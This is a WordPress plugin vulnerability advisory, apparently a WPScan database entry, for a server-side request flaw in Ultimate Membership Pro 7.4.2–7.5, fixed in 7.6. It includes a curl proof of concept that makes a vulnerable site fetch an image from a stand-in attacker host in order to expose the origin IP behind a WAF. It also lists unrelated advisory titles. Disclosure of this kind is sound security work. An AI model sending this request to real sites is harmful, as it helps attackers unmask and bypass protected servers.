Ultimate Membership Pro 7.4.2 <= 7.5 – Arbitrary media include | Plugin Vulnerabilities

Description

In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it's available on (7.4.2+ at least) to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the origin even when the site is behind a third party WAF such as Fastly, Cloudflare, Sucuri, etc:

Proof of Concept

curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

Affects Plugins

indeed-membership-pro

Fixed in 7.6

References

URL

https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253

URL

https://codecanyon.net/comments/21539595

Miscellaneous

Original Researcher

James Fraser

Submitter

fwaggle

Submitter twitter

Verified

No

WPVDB ID

f422a274-6f9e-4a20-9759-f3bb5ad972d6

Timeline

Publicly Published

2019-02-26 (about 7 years ago)

Added

2019-05-27 (about 6 years ago)

Last Updated

2020-02-07 (about 6 years ago)

Other

Published

Title

Published

2013-06-21

Title

WordPress 3.5-3.5.1 Multiple Role Remote Privilege Escalation

Published

2014-08-01

Title

DejaVu 2.4 - dl-skin.php _mysite_download_skin Parameter Absolute Path Traversal Remote File Download

Published

2020-02-26

Title

Export Users to CSV <= 1.4.2 - CSV Injection

Published

2024-12-11

Title

WooCommerce PDF Vouchers < 4.9.9 - Authentication Bypass

Published

2020-03-11

Title

Font Awesome 4.0.0-RC15 & RC16 - API Token & Access Token Disclosure